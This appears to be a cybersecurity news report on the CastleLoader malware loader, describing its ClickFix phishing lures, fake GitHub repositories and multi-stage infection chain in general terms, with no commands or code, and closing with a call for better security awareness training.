Cybersecurity researchers have uncovered an active wave of infections targeting Windows systems via a novel malware loader known as CastleLoader.
First detected in early 2025, CastleLoader has rapidly evolved into a significant distribution platform for various information-stealing and remote access Trojans (RATs).
With over 1,600 attack attempts observed, including an alarming 28.7% infection rate among users who interacted with malicious links, the campaign demonstrates a high degree of technical sophistication and social engineering.
Clickfix Phishing and Fake GitHub Repositories: New Avenues for Malware Delivery
Central to the CastleLoader campaign is the so-called Clickfix technique, leveraging convincing phishing pages themed after Cloudflare and credible developer tools.
Attackers deploy convincing replicas of error messages, captchas, and verification steps, often masquerading as browser updates, video call platforms, or document verification systems.
When unsuspecting users attempt to resolve fake errors, they are instructed to copy and execute a PowerShell command, unwittingly running malicious code on their machine.
For development-focused victims, the threat actors also create fake GitHub repositories that imitate trusted open-source projects and tools.
In one observed case, a fraudulent SQL Server Management Studio repository included a trojanized installer linked to the CastleLoader delivery infrastructure, exploiting the inherent trust users place in reputable sites, such as GitHub.
Technical Analysis: Multi-Stage Infection and Robust C2 Architecture
When the PowerShell command is executed, it downloads a malicious ZIP file from the attacker’s domain, extracts it to the local system, and executes a packaged AutoIT script.
This script injects shellcode directly into memory and immediately connects to a Command and Control (C2) server to retrieve additional payloads.
Depending on the campaign, CastleLoader deploys information stealers such as StealC, RedLine, and DeerStealer, or RATs like NetSupport RAT, SectopRAT, and additional loaders including HijackLoader.
Behind the scenes, CastleLoader’s C2 infrastructure offers a feature-rich web panel resembling a professional malware-as-a-service (MaaS) operation.
Operators can manage infections, craft customized campaigns, geo-target victims, and deploy payloads via Dockerized containers for added stealth and security.
Detailed telemetry, including system IDs, IP addresses, and execution statistics, is provided for every compromised system.
The rapid adoption and success of CastleLoader underscore a growing trend: cybercriminals are increasingly focusing on exploiting human psychology and trusted platforms, rather than relying solely on technical exploits.
The campaign’s innovative use of clipboard “poisoning” and fake repositories demonstrates that even sophisticated security systems can be bypassed when attackers target end-user behavior.
With over 469 confirmed infections, including numerous U.S. government entities, CastleLoader underscores the urgent need for revamped security awareness training and robust monitoring of social engineering vectors within the enterprise.
